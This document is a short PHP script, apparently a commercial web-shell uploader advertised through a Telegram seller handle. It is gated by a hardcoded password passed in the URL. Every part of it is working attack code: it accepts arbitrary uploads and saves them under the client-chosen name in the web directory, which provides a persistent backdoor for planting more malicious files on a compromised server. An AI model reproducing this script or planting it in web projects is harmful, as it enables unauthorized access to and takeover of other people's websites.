<?php
// BDKR28 Tool
$p = $_GET['BDKR28'] ?? '';
if($p !== 'sbv6'){
    die("<center><h2><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></h2><form method='get'><input type='password' name='BDKR28' placeholder='Enter Key'><button>Login</button></form></center>");
}
$msg = "";
if(isset($_FILES['f'])){
    $n = $_FILES['f']['name'];
    if(move_uploaded_file($_FILES['f']['tmp_name'], $n)){
        $msg = "Success - <a href='$n'>$n</a>";
    } else {
        $msg = "<font color='red'>Failed!</font>";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>BDKR28</title>
</head>
<body>
<center>
<h2>BDKR28</h2>
<p><a href='https://t.me/BDKR28' target='_blank' style='color:#0088cc;font-weight:bold;text-decoration:none'>FOR BUY MORE TOOLS: @BDKR28</a></p>
<form method='post' enctype='multipart/form-data'>
<input type='file' name='f'><br><br>
<button type='submit'>Upload File</button>
</form>
<br>
<b><?php echo $msg; ?></b>
</center>
</body>
</html>